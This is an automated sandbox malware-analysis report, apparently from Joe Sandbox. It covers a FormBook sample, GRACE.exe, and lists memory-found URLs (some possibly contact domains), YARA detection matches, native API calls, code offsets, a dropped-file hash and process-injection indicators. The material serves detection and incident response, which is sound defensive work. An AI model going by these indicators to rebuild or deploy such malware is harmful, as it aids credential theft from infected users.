          Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://www.wlw-hnlt.comReferer:
          Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: GRACE.exe, 00000000.00000002.293079053.0000000002841000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
          Source: GRACE.exe, 00000000.00000002.293079053.0000000002841000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/
          Source: GRACE.exe, 00000000.00000002.293079053.0000000002841000.00000004.00000001.sdmpString found in binary or memory: https://www.google.comT

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara matchFile source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_00419D60 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_00419E10 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_00419E90 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_00419F40 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_00419D5D NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_00419E0B NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_00419E8A NtClose,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_00419F3A NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013799A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013798F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013795D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013797A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013796E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379950 NtQueueApcThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013799D0 NtCreateProcessEx,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379820 NtEnumerateKey,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0137B040 NtSuspendThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013798A0 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379B00 NtSetValueKey,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0137A3B0 NtGetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379A10 NtQuerySection,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379A80 NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0137AD30 NtSetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379520 NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379560 NtWriteFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013795F0 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379730 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0137A710 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0137A770 NtOpenThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379770 NtSetInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379760 NtOpenProcess,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379FE0 NtCreateMutant,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379610 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379670 NtQueryInformationProcess,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01379650 NtQueryValueKey,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013796D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037399A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037396E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037396D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037395D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0373A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037399D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0373B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037398F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037398A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0373A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0373A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037397A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739560 NtWriteFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0373AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03739520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037395F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_00D19D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_00D19E90 NtClose,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_00D19E10 NtReadFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_00D19D5D NtCreateFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_00D19E8A NtClose,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_00D19E0B NtReadFile,
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_02633FAC CreateProcessAsUserW,
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_02630040
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_02638A48
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_02630A28
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_02633810
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_02634340
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_02631D50
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_02636158
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_02639668
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_02638A38
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_02633800
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_02630007
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_02630A19
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_026378F0
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_026354A8
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_026340BD
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_02635499
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_02631D40
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_02636149
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_02635920
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_0263590F
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_02636BF8
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_026FEA58
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_026FD328
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_026FC830
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_026F6638
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_026F2E01
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_026F9D60
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_026F45E8
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_026FB4A0
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_06CE2680
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_06CE0670
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_06CE84B8
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_06CE1E89
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_06CECE68
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_06CE0663
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_06CE2670
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_06CECE58
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_06CE7B38
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_06CE7B30
          Source: C:\Users\user\Desktop\GRACE.exeCode function: 0_2_06CED978
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_00401030
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0041D8D2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0041E197
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0041D313
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_00402D87
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_00409E40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0041D63C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_00409E3F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0041DF97
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0041DFAA
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_008E2050
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01354120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0133F900
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013599BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0135A830
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013F1002
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0140E824
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013620A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0134B090
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_014028EC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_014020A8
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01402B28
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0135AB40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0136EBB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013E23E3
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013F03DA
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013FDBD2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0136ABD8
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013EFA2B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013F4AEF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_014022AE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01330D20
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01401D55
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01402D07
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_014025DD
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01362581
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013F2D82
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0134D5E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0134841F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013FD466
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013F4496
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0140DFCE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01401FF1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01356E30
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013FD616
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01402EF7
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_0371AB40
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_037C2B28
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_037B03DA
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_037BDBD2
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_0372EBB0
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_037AFA2B
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_037C22AE
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_03714120
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_036FF900
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_0371A830
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_037CE824
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_037B1002
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_037C28EC
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_037220A0
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_037C20A8
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_0370B090
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_037C1FF1
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_037CDFCE
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_03716E30
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_037BD616
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_037C2EF7
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_037C1D55
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_036F0D20
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_037C2D07
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_0370D5E0
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_037C25DD
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_03722581
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_037BD466
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_0370841F
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_00D1E197
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_00D02D90
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_00D02D87
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_00D09E40
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_00D09E3F
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_00D1DF97
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_00D02FB0
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_00D1DFAA
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe 23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: String function: 0133B150 appears 133 times
Source: C:\Windows\SysWOW64\netsh.exe | Code function: String function: 036FB150 appears 54 times
Source: GRACE.exe, 00000000.00000002.292894435.0000000002600000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameRunPe6.dll" vs GRACE.exe
Source: GRACE.exe, 00000000.00000002.296613818.00000000059D0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs GRACE.exe
Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameSHCore1.dll0 vs GRACE.exe
Source: GRACE.exe, 00000000.00000002.296291104.0000000004F60000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs GRACE.exe
Source: GRACE.exe, 00000000.00000002.297040723.0000000008800000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameAddInProcess32.exeT vs GRACE.exe
Source: GRACE.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
